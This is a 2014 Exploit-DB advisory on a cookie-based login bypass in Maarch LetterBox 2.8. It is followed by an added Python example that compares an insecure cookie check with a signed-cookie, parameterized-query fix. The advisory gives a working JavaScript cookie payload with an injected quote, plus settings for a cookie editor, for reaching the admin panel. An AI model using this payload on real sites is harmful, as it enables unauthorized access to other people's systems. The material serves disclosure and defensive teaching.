Maarch LetterBox 2.8 – (Authentication Bypass) Insecure Cookies

  • Author: ZoRLu Bugrahan
    Date: 2014-11-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/35271/
  • # Title: Maarch LetterBox 2.8 Insecure Cookie Handling Vulnerability (Login Bypass)
    # Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
    # Home : http://milw00rm.com / its online
    # Date : 17.11.2014
    # Demo		 : http://www.era.sn/courrier
    # Download 	 : http://downloads.sourceforge.net/project/maarchletterbox/MaarchLetterBox2.8.zip
    # Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
    
    First, go here:
    
    http://www.target.com/path/index.php?page=welcome.php
    
    You will be taken to login.php, but if we change our cookie with this exploit, we will be logged in to the admin panel.
    
    exploit:
    
    javascript:document.cookie = "UserId=[username] ' or '; path=/";
    
    Or edit your cookie with "Cookies Manager":
    
    name = maarch
    contents = UserId=username ' or '
    host = your target
    path = /script_path/
    
    Do not change the other options; keep their defaults.
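
For the defensive side of the cookie handling described above, here is an added example (not code from the advisory or from Maarch) that contrasts a login check that trusts a client-set `UserId` cookie with one that accepts only a server-signed value and looks the user up with a bound parameter. The weak pattern, the table layout, the `admin` user and all function names are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
import sqlite3

# Constructed sample data; table, column and user names are assumptions.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE users (user_id TEXT PRIMARY KEY)")
DB.execute("INSERT INTO users VALUES ('admin')")

SERVER_KEY = secrets.token_bytes(32)  # stays on the server, never sent to clients


def weak_is_logged_in(cookies):
    """Assumed insecure pattern: any client-supplied UserId cookie counts as a login."""
    return bool(cookies.get("UserId"))


def _tag(user_id):
    return hmac.new(SERVER_KEY, user_id.encode(), hashlib.sha256).hexdigest()


def issue_cookie(user_id):
    """Call only after a successful password check: value plus HMAC tag."""
    return f"{user_id}|{_tag(user_id)}"


def hardened_user(cookies):
    """Return the authenticated user id, or None if the cookie was not issued by us."""
    user_id, sep, tag = cookies.get("UserId", "").rpartition("|")
    if not sep:
        return None  # no tag at all: the browser made this value up
    if not hmac.compare_digest(tag.encode(), _tag(user_id).encode()):
        return None  # tag does not match: value was edited client-side
    # Bound parameter: quotes in the value are data, never SQL syntax.
    row = DB.execute(
        "SELECT user_id FROM users WHERE user_id = ?", (user_id,)
    ).fetchone()
    return row[0] if row else None


# Cookie value in the shape the advisory gives, with a constructed username.
FORGED = {"UserId": "admin ' or '"}
```

A random session identifier stored server-side and mapped to the user after login achieves the same goal; in both designs the browser never gets to name its own identity.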